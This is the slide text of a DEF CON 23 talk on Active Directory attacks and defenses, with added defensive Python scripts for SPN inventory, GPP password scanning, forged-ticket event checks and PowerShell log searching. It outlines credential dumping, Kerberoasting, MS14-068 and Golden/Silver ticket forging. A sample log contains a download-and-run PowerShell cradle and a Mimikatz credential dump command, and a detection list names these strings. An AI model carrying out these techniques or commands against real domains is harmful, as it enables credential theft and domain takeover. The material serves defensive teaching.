DEF CON 23 - Sean-Metcalf-Red-vs-Blue-AD-Attack-and-Defense

This document discusses red team (offensive) and blue team (defensive) tactics related to modern Active Directory attacks. It covers common red team techniques like exploiting Kerberos weaknesses, dumping credentials from Active Directory servers, and forging Golden and Silver tickets. The document also provides recommendations for blue teams to detect these attacks and strengthen defenses, such as monitoring for Kerberos anomalies, limiting PowerShell access, and leveraging new security features in PowerShell version 5.


Red vs. Blue: Modern Active Directory Attacks & Defense

Sean Metcalf
CTO
DAn Solutions
sean [@] dansolutions . com
http://DAnSolutions.com
http://www.ADSecurity.org
Photo by Ed Speir IV. All Rights Reserved. Used with Permission.
ABOUT
Chief Technology Officer - DAn Solutions
Microsoft Certified Master (MCM) Directory Services
Security Researcher / Purple Team
Security Info -> ADSecurity.org
AGENDA
Red Team (Recon, Escalate, Persist)
Blue Team (Detect, Mitigate, Prevent)
Kerberos TGT Ticket
Kerberos Overview
Kerberos Key Points
NTLM password used for Kerberos RC4 encryption.
Logon Ticket (TGT) proves prior user auth to DC.
Kerberos policy only checked at TGT creation
DC only validates user account when TGT > 20 mins.
Service Ticket (TGS) PAC validation is optional & rare.
Red Team (Offense)
“SPN Scanning” Service Discovery
SQL servers, instances, ports, etc.
MSSQLSvc/adsmsSQLAP01.adsecurity.org:1433
Exchange Client Access Servers
exchangeMDB/adsmsEXCAS01.adsecurity.org
RDP
TERMSERV/adsmsEXCAS01.adsecurity.org
Going from N/A to DA (Domain Admin)
Poor Service Account Passwords
Passwords in SYSVOL
Credential Theft
Misconfiguration / Incorrect Perms
Exploit Vulnerability
SPN Scanning for Service Accounts with Find-PSServiceAccounts

SPN Directory: http://adsecurity.org/?page_id=183
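The SPN scanning described above is just directory reads, so a defender can run the same inventory and see what an attacker would see. The following is an added example, not code from the talk or from Find-PSServiceAccounts: it parses servicePrincipalName values of the form serviceclass/host[:port][/name], builds the service-discovery view (which hosts offer which service class), and lists the user accounts that carry SPNs, since those are the accounts whose TGS tickets can be requested and cracked offline (the Kerberoast case below). The account records, the "today" date and the 365-day staleness threshold are constructed assumptions.

```python
"""SPN inventory helper: an added example, not code from the talk.

Parses servicePrincipalName values of the form
    serviceclass/host[:port-or-instance][/servicename]
and reports which accounts expose which services. User (non-computer)
accounts with SPNs are the Kerberoast targets: any domain user can request
a TGS ticket for them and crack it offline, so their password age and
length are what a defender should review. All records below are
constructed sample data; the account names are fictitious.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

# Constructed sample directory records (the SPN hosts reuse the talk's examples)
SAMPLE_ACCOUNTS = [
    {"sam": "svc-sql", "is_computer": False, "pwd_last_set": "2012-03-01",
     "spns": ["MSSQLSvc/adsmsSQLAP01.adsecurity.org:1433",
              "MSSQLSvc/adsmsSQLAP01.adsecurity.org"]},
    {"sam": "ADSMSEXCAS01$", "is_computer": True, "pwd_last_set": "2015-07-20",
     "spns": ["exchangeMDB/adsmsEXCAS01.adsecurity.org",
              "TERMSERV/adsmsEXCAS01.adsecurity.org",
              "HOST/adsmsEXCAS01.adsecurity.org"]},
    {"sam": "svc-backup", "is_computer": False, "pwd_last_set": "2015-06-01",
     "spns": ["backup/adsmsBKP01.adsecurity.org/BackupExec"]},
]
SAMPLE_NOW = datetime(2015, 8, 8)  # constructed "today" for the age check


@dataclass
class SPN:
    service_class: str
    host: str
    port: Optional[int] = None        # numeric port, e.g. 1433
    instance: Optional[str] = None    # non-numeric suffix, e.g. a SQL instance name
    service_name: Optional[str] = None


def parse_spn(spn: str) -> SPN:
    """Split 'class/host[:port][/name]'; raise ValueError on malformed input."""
    parts = spn.split("/")
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError(f"not a valid SPN: {spn!r}")
    host, _, suffix = parts[1].partition(":")
    return SPN(
        service_class=parts[0],
        host=host,
        port=int(suffix) if suffix.isdigit() else None,
        instance=suffix if suffix and not suffix.isdigit() else None,
        service_name=parts[2] if len(parts) > 2 else None,
    )


def services_by_class(accounts) -> Dict[str, List[str]]:
    """SPN scanning view: which hosts (host[:port]) offer each service class."""
    index = defaultdict(set)
    for acct in accounts:
        for raw in acct["spns"]:
            index[parse_spn(raw).service_class].add(raw.split("/", 2)[1])
    return {cls: sorted(hosts) for cls, hosts in index.items()}


def kerberoast_exposed(accounts, now, max_age_days=365):
    """User accounts with SPNs, with password age, so stale service-account
    passwords (the talk's 'poor service account passwords') stand out."""
    findings = []
    for acct in accounts:
        if acct["is_computer"]:
            continue  # computer account passwords are random and auto-rotated
        age = (now - datetime.fromisoformat(acct["pwd_last_set"])).days
        classes = sorted({parse_spn(s).service_class for s in acct["spns"]})
        findings.append({"sam": acct["sam"], "services": classes,
                         "pwd_age_days": age, "stale": age > max_age_days})
    return findings


if __name__ == "__main__":
    for cls, hosts in services_by_class(SAMPLE_ACCOUNTS).items():
        print(f"{cls}: {', '.join(hosts)}")
    for f in kerberoast_exposed(SAMPLE_ACCOUNTS, SAMPLE_NOW):
        print(f)
```

In a real run the records would come from an LDAP query for objects with a servicePrincipalName; the parser is the same. Computer accounts are skipped because their passwords are long, random and rotated automatically, which is also why the talk's later Silver Ticket point (a stolen DC computer account hash) matters so much: those are the SPN-bearing accounts this view does not flag.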
Cracking Service Account Passwords (Kerberoast)
Request/Save TGS service tickets & crack offline.
“Kerberoast” python-based TGS password cracker.
No elevated rights required.
No traffic sent to target.
Kerberoast: Request TGS Service Ticket
Kerberoast: Save & Crack TGS Service Ticket
Exploiting Group Policy Preferences
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
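The SYSVOL path above is readable by every domain user, which is what makes Group Policy Preference items with stored passwords dangerous: the password sits in a cpassword attribute encrypted with a key Microsoft has published. The following added example (not code from the talk, and not the GPP retrieval script it references) is the defender's half of that problem: it walks a SYSVOL tree, parses the well-known GPP item files (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) and reports every item that still carries a cpassword, without decrypting anything. The sample tree, policy GUID and cpassword value are constructed.

```python
"""Scanner for Group Policy Preference files that still carry a cpassword
attribute: an added example, not code from the talk.

GPP item files under SYSVOL store any password the admin typed as a
'cpassword' attribute encrypted with a key that Microsoft published, so
every domain user who can read SYSVOL can recover it. This scanner only
reports where such attributes exist (it does not decrypt anything); the fix
is to delete or re-create those policies without credentials. The SYSVOL
tree below is constructed sample data written to a temporary directory and
the policy GUID is a placeholder.
"""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import List, Tuple

GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed Groups.xml: one local-user item with a (fake) cpassword value
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" status="LocalAdmin">
    <Properties action="U" userName="LocalAdmin" newName="" fullName=""
      cpassword="CONSTRUCTED-SAMPLE-NOT-A-REAL-VALUE"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"""

# Constructed Services.xml that configures a service without any stored password
SAMPLE_SERVICES_XML = """<?xml version="1.0" encoding="utf-8"?>
<NTServices>
  <NTService name="Spooler">
    <Properties startupType="AUTOMATIC" serviceName="Spooler" accountName="LocalSystem"/>
  </NTService>
</NTServices>
"""


def build_sample_sysvol() -> str:
    """Create a throwaway SYSVOL-like tree and return its root path."""
    root = Path(tempfile.mkdtemp(prefix="sysvol-sample-"))
    policy = root / "adsecurity.org" / "Policies" / "{00000000-0000-0000-0000-000000000001}"
    groups = policy / "Machine" / "Preferences" / "Groups"
    services = policy / "Machine" / "Preferences" / "Services"
    groups.mkdir(parents=True)
    services.mkdir(parents=True)
    (groups / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
    (services / "Services.xml").write_text(SAMPLE_SERVICES_XML, encoding="utf-8")
    # A non-GPP XML file with the same attribute name must not be reported
    (policy / "Other.xml").write_text('<x cpassword="ignored"/>', encoding="utf-8")
    return str(root)


def find_cpasswords(sysvol_root: str) -> List[Tuple[str, str, str]]:
    """Walk SYSVOL and return (relative path, item tag, item name) for every
    GPP item whose Properties element carries a non-empty cpassword."""
    root = Path(sysvol_root)
    hits = []
    for path in sorted(root.rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        try:
            tree = ET.parse(path)
        except ET.ParseError:
            continue  # malformed file: a production tool should log this
        # ElementTree has no parent links, so walk parent -> child pairs
        for item in tree.getroot().iter():
            for child in item:
                if child.attrib.get("cpassword"):
                    hits.append((str(path.relative_to(root)), item.tag,
                                 item.attrib.get("name", "")))
    return hits


if __name__ == "__main__":
    for rel, tag, name in find_cpasswords(build_sample_sysvol()):
        print(f"cpassword found: {rel} [{tag} {name!r}]")
```

Point the scanner at the Policies directory of a real SYSVOL replica (read-only access is enough) and treat every hit as a credential that must be rotated, not just a file to delete: the password has been readable by every domain user since the policy was created.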
Mimikatz: The Credential Multi-tool
Dump credentials
Windows protected memory (LSASS). *
Active Directory Domain Controller database. *
Dump Kerberos tickets
for all users. *
for current user.
Credential Injection
Password hash (pass-the-hash)
Kerberos ticket (pass-the-ticket)
Generate Silver and/or Golden tickets
And so much more!
Dump Credentials with Mimikatz
User Service Account
Dumping AD Domain Credentials
Dump credentials on DC (local or remote).
Run Mimikatz (WCE, etc) on DC.
Invoke-Mimikatz on DC via PS Remoting.
Get access to the NTDS.dit file & extract data.
Copy AD database from remote DC.
Grab AD database copy from backup.
Get Virtual DC data.
Dump AD Credentials with Mimikatz
Dump LSASS Process Memory
Remotely Grab the DIT!
Instead of VSS, why not leverage NTDSUtil?
Finding NTDS.dit on the Network
Are your DC backups properly secured?
Who administers the virtual server hosting the DCs?
Are your VMware/Hyper-V host admins considered Domain Admins?
Hint: They should be.
Dump Password Hashes from NTDS.dit
Pass The… Credential
Pass the Hash
Pass the Ticket
Over Pass the Hash
Over Pass the Hash
MS14-068: (Microsoft) Kerberos Vulnerability
MS14-068 (CVE-2014-6324) Patch released 11/18/2014
Domain Controller Kerberos Service (KDC) didn’t correctly validate the PAC checksum.
Effectively re-writes the user’s ticket to be a Domain Admin.
Own AD in 5 minutes
http://adsecurity.org/?tag=ms14068
MS14-068 (PyKEK 12/5/2014)
MS14-068 Kekeo Exploit
MS14-068 Kekeo Exploit – Packet Capture
User to Admin in 5 Minutes?
Sneaky AD Persistence Tricks
(Attacker has DA access for 5 minutes)
• DSRM
• Local Policy
• SSP
• Logon Scripts
• Group Policy
• Skeleton Key
• Scheduled Tasks
• SID History
• WMI
• Kerberos Ticket Forging
• Output | SYSVOL
DSRM? What’s DSRM?
• Directory Services Restore Mode
• “Break glass” access to DC
• DSRM password set when DC is promoted
• Rarely changed.
DSRM = DC Local Administrator Account
Using DSRM Creds
• Reboot to DSRM
• Access DSRM without Rebooting (2k8+)
• DsrmAdminLogonBehavior = 1
• Stop Active Directory (ntds) service
• Console logon (not RDP)
Using DSRM Creds
• Access DSRM without Rebooting (2k8+)
• DsrmAdminLogonBehavior = 2
• Stop Active Directory (ntds) service
• Console logon (not RDP)
Using DSRM Creds Over the Network
• Console logon
• VMware Remote Console (TCP 903)
• Hyper-V VM Connection (TCP 5900)
• Network KVM
Malicious Security Service Provider (SSP)
• Mimikatz supports registry & in-memory updating
Skeleton Key
• Memory resident LSASS patch - “master key” for all accounts
Skeleton Key
• Account authentication success! With 2 different passwords?
SID History
• User account attribute supporting migration.
• Mimikatz enables SID History injection to any user account.
SID History
SID History -> Domain Exploitation
Forging Kerberos Golden/Silver Tickets
Requires KRBTGT pw hash / service account pw hash.
Forged TGT (Golden Ticket) bypasses all user restrictions.
Create anywhere & use from any computer on the network.
No elevated rights required to create/use.
User password changes have no impact on forged ticket!
KRBTGT: The Kerberos Service Account
KRBTGT account: disabled and hidden by default.
Sign/encrypt AD Kerberos tickets.
Pwd set when domain created & (almost) never changes
Password changes when DFL -> 2008 (or newer).
Current & Previous Password valid for Kerberos tickets
KRBTGT password exposed? Requires changing twice!
Microsoft KRBTGT password change script on TechNet
RODC Kerberos Account: KRBTGT_######.
KRBTGT: The Kerberos Service Account
The Golden Ticket (Forged TGT)
Encrypted/Signed by KRBTGT (RID 502).
Bypasses Smart Card authentication requirement
Golden Ticket options:
Impersonate existing Domain Admin
Create Fictitious user
Spoof access by adding groups to the ticket
Impersonate C-level executive access
Limited to Domain it’s created in *
Where are the crown jewels?
Golden Ticket (Forged TGT) Communication
Forging a Golden Ticket: KRBTGT NTLM Hash
Golden Ticket Limitation
Admin rights limited to current domain.
Doesn’t work across trusts unless in EA domain.
Golden Ticket – Now More GOLDEN!
Mimikatz now supports SID History in Golden Tickets
The Silver Ticket (Forged TGS)
Service account configured for Kerberos auth (SPN).
Encrypted with the service account private key:
Service account NTLM password hash
AD computer account NTLM password hash
Service opens TGS ticket to validate.
Golden Ticket equivalent access to service.
No associated TGT exists, so no communication with a DC.
Silver Ticket (Forged TGS) Communication
Silver Ticket: Domain Controller Exploitation

• Attacker dumped AD & has all domain creds.
• Corp IT changed all user, admin, and service account passwords (and KRBTGT pw 2x).
• Attacker still has Domain Controller computer account password hashes.
What is possible with these?

Silver Ticket: Domain Controller Exploitation

Gain access to a Domain Controller’s AD computer account password.
Generate Silver Ticket for CIFS SPN to access file system via default shares.
Generate Silver Ticket for HOST SPN to create scheduled task to run as local System (and re-exploit the domain).
HOST = alerter, appmgmt, cisvc, clipsrv, browser, dhcp, dnscache, replicator, eventlog, eventsystem, policyagent, oakley, dmserver, dns, mcsvc, fax, msiserver, ias, messenger, netlogon, netman, netdde, netddedsm, nmagent, plugplay, protectedstorage, rasman, rpclocator, rpc, rpcss, remoteaccess, rsvp, samss, scardsvr, scesrv, seclogon, scm, dcom, cifs, spooler, snmp, schedule, tapisrv, trksvr, trkwks, ups, time, wins, www, http, w3svc, iisadmin, msdtc
Blue Team (Defense)
Detecting MS14-068 On the Wire
AS-REQ TGS-REQ
Detecting Forged Kerberos
Golden (TGT) & Silver (TGS) Tickets
• Normal, valid account logon event data structure:
• Security ID: DOMAIN\AccountID
• Account Name: AccountID
• Account Domain: DOMAIN
• Golden & Silver Ticket events may have one of these issues:
• The Account Domain field is blank when it should contain DOMAIN.
• The Account Domain field is DOMAIN FQDN when it should contain DOMAIN.
• The Account Domain field contains “eo.oe.kiwi :)”
Detecting MS14-068 Exploit Security Events
• Normal, valid account logon event data structure:
• Security ID: DOMAIN\AccountID
• Account Name: AccountID
• Account Domain: DOMAIN
• MS14-068 Exploit events may have 1 (or more) of these:
• The Account Domain field is blank when it should be DOMAIN.
• The Account Domain field is DOMAIN FQDN when it should be DOMAIN.
• Account Name is a different account from the Security ID.
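The two detection slides above (forged Golden/Silver tickets, and MS14-068 exploitation) describe the same kind of check: compare the Security ID, Account Name and Account Domain fields of a logon event against what a valid logon looks like. The following added example (not code from the talk) turns those bullets into a small parser and rule set over the "New Logon" block of a Windows logon event, flagging a blank domain, a domain written as the DNS FQDN, the "eo.oe.kiwi :)" marker, and an Account Name that does not match the account in the Security ID. The domain names and the five sample events are constructed.

```python
"""Field checks for forged-ticket and MS14-068 logon events: an added
example, not code from the talk.

Parses the 'New Logon' field block of a Windows logon event (Security ID,
Account Name, Account Domain) and flags the anomalies the talk lists:
  blank_domain       Account Domain is empty
  fqdn_domain        Account Domain is the DNS name, not the NetBIOS name
  mimikatz_marker    Account Domain contains 'eo.oe.kiwi :)'
  name_sid_mismatch  Account Name is not the account named in Security ID
The domain names and the events below are constructed sample data.
"""
import re
from typing import Dict, List, Tuple

DNS_DOMAIN = "adsecurity.org"     # assumed DNS name of the domain whose NetBIOS name is ADSECURITY
MIMIKATZ_MARKER = "eo.oe.kiwi :)"

FIELD_RE = re.compile(r"^\s*(Security ID|Account Name|Account Domain):\s*(.*?)\s*$")

# Constructed sample events, trimmed to the relevant fields
SAMPLE_EVENTS = [
    # 0: normal logon (the Subject block must not be confused with New Logon)
    """Event ID: 4624
Subject:
    Security ID:    NULL SID
    Account Name:   -
    Account Domain: -
New Logon:
    Security ID:    ADSECURITY\\joeuser
    Account Name:   joeuser
    Account Domain: ADSECURITY""",
    # 1: forged ticket, domain left blank
    """Event ID: 4624
New Logon:
    Security ID:    ADSECURITY\\joeuser
    Account Name:   joeuser
    Account Domain:""",
    # 2: forged ticket built with the FQDN instead of the NetBIOS name
    """Event ID: 4624
New Logon:
    Security ID:    ADSECURITY\\joeuser
    Account Name:   joeuser
    Account Domain: ADSECURITY.ORG""",
    # 3: mimikatz default value left in the domain field
    """Event ID: 4624
New Logon:
    Security ID:    ADSECURITY\\joeuser
    Account Name:   joeuser
    Account Domain: eo.oe.kiwi :)""",
    # 4: MS14-068 pattern, Account Name and Security ID disagree
    """Event ID: 4624
New Logon:
    Security ID:    ADSECURITY\\joeuser
    Account Name:   administrator
    Account Domain: ADSECURITY""",
]


def parse_new_logon(event_text: str) -> Dict[str, str]:
    """Return the three fields of the 'New Logon:' section (first occurrence
    of each), skipping the 'Subject:' section that precedes it in 4624."""
    fields: Dict[str, str] = {}
    _, sep, body = event_text.partition("New Logon:")
    for line in (body if sep else event_text).splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields.setdefault(m.group(1), m.group(2))
    return fields


def check_logon(event_text: str) -> List[str]:
    """Apply the four checks and return the names of those that fire."""
    f = parse_new_logon(event_text)
    domain = f.get("Account Domain", "")
    name = f.get("Account Name", "")
    sid = f.get("Security ID", "")
    issues = []
    if domain == "":
        issues.append("blank_domain")
    if domain.lower() == DNS_DOMAIN.lower():
        issues.append("fqdn_domain")
    if MIMIKATZ_MARKER in domain:
        issues.append("mimikatz_marker")
    # Security ID is shown as DOMAIN\Account once resolved; compare the account part
    if "\\" in sid and sid.rsplit("\\", 1)[1].lower() != name.lower():
        issues.append("name_sid_mismatch")
    return issues


def triage(events) -> List[Tuple[int, List[str]]]:
    """(index, issues) for every event with at least one finding."""
    results = [(i, check_logon(e)) for i, e in enumerate(events)]
    return [(i, issues) for i, issues in results if issues]


if __name__ == "__main__":
    for i, issues in triage(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(issues)}")
```

Run over exported 4624/4672 event text (or the equivalent fields from a SIEM), these checks are cheap enough to apply to every logon on every DC and server. Unresolved raw SIDs skip the mismatch check rather than producing false positives, which is the one case the talk's "Security ID: DOMAIN\AccountID" description does not cover.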
AD Attack Mitigation: PowerShell Security
• Limit PowerShell Remoting (WinRM).
• Limit WinRM listener scope to admin subnets.
• Disable PowerShell Remoting (WinRM) on DCs.
• Audit/block PowerShell script execution via AppLocker.
• PowerShell v3+: Enable PowerShell Module logging (via GPO).
• Search PowerShell logs for “mimikatz”, “gentilkiwi”, “Delpy”, “iex (new-object net.webclient).downloadstring”, etc.
• Leverage Metering for PowerShell usage trend analysis.
• JoeUser ran PowerShell on 10 computers today?
• Track PowerShell Remoting Usage
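Two of the bullets above, the log keyword search and the usage metering, are easy to prototype once module logging is turned on. The following added example (not code from the talk) runs both over constructed module-log records: the keyword search matches the strings the talk names case-insensitively and tolerates the spacing variations of the download cradle, and the metering check counts the distinct computers each user ran PowerShell on per day and raises the "JoeUser ran PowerShell on 10 computers today?" question automatically. The record layout, user and computer names and the threshold of 10 are assumptions.

```python
"""PowerShell log keyword search and usage metering: an added example, not
code from the talk.

Two checks over constructed module-log records:
  * a search of logged script text for the strings the talk names
    (mimikatz, gentilkiwi, Delpy, the 'iex (new-object net.webclient)
    .downloadstring' cradle), case-insensitive and tolerant of spacing;
  * per-user metering of how many distinct computers each user ran
    PowerShell on per day.
Record layout, user and computer names and the threshold are assumptions.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

SUSPICIOUS_PATTERNS = {
    "mimikatz": re.compile(r"mimikatz", re.I),
    "gentilkiwi": re.compile(r"gentilkiwi", re.I),
    "delpy": re.compile(r"\bdelpy\b", re.I),
    "download-cradle": re.compile(
        r"iex\s*\(\s*new-object\s+net\.webclient\s*\)\s*\.\s*downloadstring", re.I),
}

# Constructed records: (timestamp, computer, user, logged script text)
SAMPLE_LOG: List[Tuple[str, str, str, str]] = [
    ("2015-08-07T08:55:00", "WS01", "joeuser", "Get-ChildItem C:\\Temp"),
    ("2015-08-07T09:12:00", "DC01", "adminjoe",
     "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"),
    ("2015-08-07T09:13:00", "DC01", "adminjoe", "Invoke-Mimikatz -DumpCreds"),
] + [
    # the same user running an innocuous command on ten servers in one morning
    (f"2015-08-07T10:{i:02d}:00", f"SRV{i:02d}", "joeuser", "Get-Service")
    for i in range(1, 11)
]


def find_suspicious(records) -> List[Tuple[int, str]]:
    """(record index, pattern name) for every record whose text matches."""
    hits = []
    for i, (_, _, _, text) in enumerate(records):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(text):
                hits.append((i, name))
    return hits


def computers_per_user_day(records) -> Dict[Tuple[str, str], Set[str]]:
    """Group distinct computers by (user, calendar day)."""
    seen: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for ts, computer, user, _ in records:
        seen[(user.lower(), ts[:10])].add(computer.upper())
    return seen


def metering_alerts(records, threshold=10) -> List[Tuple[str, str, int]]:
    """(user, day, count) where a user ran PowerShell on >= threshold computers."""
    return sorted(
        (user, day, len(hosts))
        for (user, day), hosts in computers_per_user_day(records).items()
        if len(hosts) >= threshold
    )


if __name__ == "__main__":
    for i, name in find_suspicious(SAMPLE_LOG):
        print(f"record {i}: matched {name}: {SAMPLE_LOG[i][3]}")
    for user, day, n in metering_alerts(SAMPLE_LOG):
        print(f"{user} ran PowerShell on {n} computers on {day}")
```

The keyword search only catches unobfuscated use; that is the gap the PowerShell v5 script block logging mentioned on the next slide helps with, since it records the code as it is actually executed. The metering check does not depend on script content at all, which is why the two belong together.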
PowerShell v5 Security Enhancements

• System-wide transcripts
• Script block logging
• Constrained PowerShell
• Antimalware Integration (Win 10)
Mitigation Level One (Low)
• Minimize the groups (& users) with DC admin/logon rights
• Separate user & admin accounts (JoeUser & AdminJoeUser)
• No user accounts in admin groups
• Set all admin accounts to “sensitive & cannot be delegated”
• Deploy Security Back-port patch (KB2871997) which adds local SIDs & enable regkey to prevent clear-text pw in LSASS.
• Set GPO to prevent local accounts from connecting over network to computers (easy with KB2871997).
• Use long, complex (>25 characters) passwords for SAs.
• Delete (or secure) GPP policies and files with creds.
• Patch server image (and servers) before running DCPromo
• Implement RDP Restricted Admin mode
Mitigation Level Two (Moderate)
• Microsoft LAPS (or similar) to randomize computer local admin account passwords.
• Service Accounts (SAs):
• Leverage “(Group) Managed Service Accounts”.
• Implement Fine-Grained Password Policies (DFL >2008).
• Limit SAs to systems of the same security level, not shared between workstations & servers (for example).
• Remove Windows 2003 from the network.
• Separate Admin workstations for administrators (locked-down & no internet).
• PowerShell logging
Mitigation Level Three (“It’s Complicated”)
• Number of Domain Admins = 0
• Complete separation of administration (New Admin Model)
• ADAs use SmartCard auth w/ rotating pw
• ADAs never logon to other security tiers.
• ADAs should only logon to a DC (or admin workstation or server).
• Time-based, temporary group membership.
• No Domain Admin service accounts running on non-DCs.
• Disable default local admin account & delete all other local accounts.
• Implement network segmentation.
• CMD Process logging & enhancement (KB3004375).
Attack Detection Paradigm Shift
• Microsoft Advanced Threat Analytics (ATA, formerly Aorato)
• Monitors all network traffic to Domain Controllers
• Baselines “normal activity” for each user (computers, resources, etc.)
• Alerts on suspicious activity by user
• Natively detects recon & attack activity without writing rules
• ATA Detection Capability:
• Credential theft & use: Pass the hash, Pass the ticket, Over-Pass the hash, etc.
• MS14-068 exploits
• Golden Ticket usage
• DNS Reconnaissance
• Password brute forcing
• Domain Controller Skeleton Key Malware
Microsoft ATA Suspicious Activity
Credential Theft Protection (Future)
Additional Mitigations
• Monitor scheduled tasks on sensitive systems (DCs, etc.)
• Block internet access to DCs & servers.
• Monitor security event logs on all servers for known forged Kerberos & backup events.
• Include computer account password changes as part of domain-wide password change scenario (breach recovery).
• Change the KRBTGT account password (twice) every year & when an AD admin leaves.
• Incorporate Threat Intelligence in your process and model defenses against real, current threats.
Summary
• Attackers will get code running on a target network.
• The extent of attacker access is based on defensive posture.
• Advanced attacks may be detectable. Though it’s better to prevent this type of access in the first place.
• Protect AD Admins or a full domain compromise is likely!
My research into AD attack, defense, & detection is ongoing. This is only the beginning…
Thanks!
• Alva “Skip” Duckwall (@passingthehash)
http://passing-the-hash.blogspot.com
• Benjamin Delpy (@gentilkiwi)
http://blog.gentilkiwi.com/mimikatz
• Chris Campbell (@obscuresec)
http://obscuresecurity.blogspot.com
• Joe Bialek (@clymb3r)
https://clymb3r.wordpress.com
• Matt Graeber (@mattifestation)
http://www.exploit-monday.com
• Rob Fuller (@mubix)
http://www.room362.com
• Will Schroeder (@harmj0y)
http://blog.harmj0y.net
• Many others in the security community!
• My wife & family for putting up with me being on the computer every night!

CONTACT:
Sean Metcalf
@PyroTek3
sean [@] dansolutions . com
http://DAnSolutions.com
https://www.ADSecurity.org
References
• Skip Duckwall & Benjamin Delpy’s Black Hat USA 2014 presentation “Abusing Microsoft Kerberos – Sorry Guys You Still Don’t Get It”
http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it
• Tim Medin’s DerbyCon 2014 presentation “Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades”
https://www.youtube.com/watch?v=PUyhlN-E5MU
• TechEd North America 2014 presentation “TWC: Pass-the-Hash and Credential Theft Mitigation Architectures” (DCIM-B213), speakers Nicholas DiCola and Mark Simos
http://channel9.msdn.com/Events/TechEd/NorthAmerica/2014/DCIM-B213
• Chris Campbell, “GPP Password Retrieval with PowerShell”
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
• “Protection from Kerberos Golden Ticket - Mitigating pass the ticket on Active Directory”, CERT-EU Security White Paper 2014-07
http://cert.europa.eu/static/WhitePapers/CERT-EU-SWP_14_07_PassTheGolden_Ticket_v1_1.pdf
• “An overview of KB2871997”
http://blogs.technet.com/b/srd/archive/2014/06/05/an-overview-of-kb2871997.aspx
• Microsoft security advisory: Update to improve Windows command-line auditing (2/10/2015)
http://support.microsoft.com/en-us/kb/3004375
• “Kerberos, Active Directory’s Secret Decoder Ring”
http://adsecurity.org/?p=227
• “Kerberos & KRBTGT: Active Directory’s Domain Kerberos Account”
http://adsecurity.org/?p=483
• PowerShell Code: Check KRBTGT Domain Kerberos Account Last Password Change
http://adsecurity.org/?p=481
• “Mimikatz and Active Directory Kerberos Attacks”
http://adsecurity.org/?p=556
• “Mining Active Directory Service Principal Names”
http://adsecurity.org/?p=230
• MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege
http://adsecurity.org/?tag=ms14068
• Microsoft Enhanced security patch KB2871997
http://adsecurity.org/?p=559
• SPN Directory
http://adsecurity.org/?page_id=183
• PowerShell Code: Find-PSServiceAccounts
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
• DEF CON 22 - Ryan Kazanciyan and Matt Hastings, “Investigating PowerShell Attacks”
https://www.youtube.com/watch?v=qF06PFcezLs
• Mandiant 2015 Threat Report
https://www2.fireeye.com/WEB-2015RPTM-Trends.html
• PowerSploit
https://github.com/mattifestation/PowerSploit
• PowerView
https://github.com/Veil-Framework/PowerTools/tree/master/PowerView
• PoshSec
https://github.com/PoshSec
• Microsoft Kerberos PAC Validation
http://blogs.msdn.com/b/openspecification/archive/2009/04/24/understanding-microsoft-kerberos-pac-validation.aspx
• “Admin Free” Active Directory and Windows, Part 1 & 2
http://blogs.technet.com/b/lrobins/archive/2011/06/23/quot-admin-free-quot-active-directory-and-windows-part-1-understanding-privileged-groups-in-ad.aspx
